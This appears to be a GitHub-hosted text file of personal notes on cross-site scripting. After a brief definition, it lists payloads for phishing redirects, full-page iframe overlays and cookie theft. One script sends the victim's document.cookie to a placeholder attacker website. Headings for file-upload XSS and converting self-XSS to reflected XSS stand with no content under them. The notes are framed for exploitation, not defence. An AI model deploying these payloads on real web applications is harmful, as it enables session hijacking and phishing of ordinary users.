-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathxss4.txt
42 lines (20 loc) · 1.02 KB
/
xss4.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
xss through header parameter
vulnerability name : cross site scripting
vulnerability description : xss are a type of injection , in which malicious scripts are injected into otherwise benign and
trusted web sites. xss attacks occur when an attacker uses a web application to send code , generally
in the form of a browser side script, to a different end user
#=============================================================================
exploitation of xss phishing
1. document.location.href="website"
2.phishing advance
<iframe src="website"></iframe>
<iframe src="website" height="100%" width="100%" ></iframe>
3.cookie stealing xss
<script>alert(document.cookie)</script>
previous attack give cookie as popup
<script>document.location.href="our_website"+document.cookie</script>
this give cookie of client
#==============================================================================
xss through file upload
#==========================================================================
convert self xss to reflected xss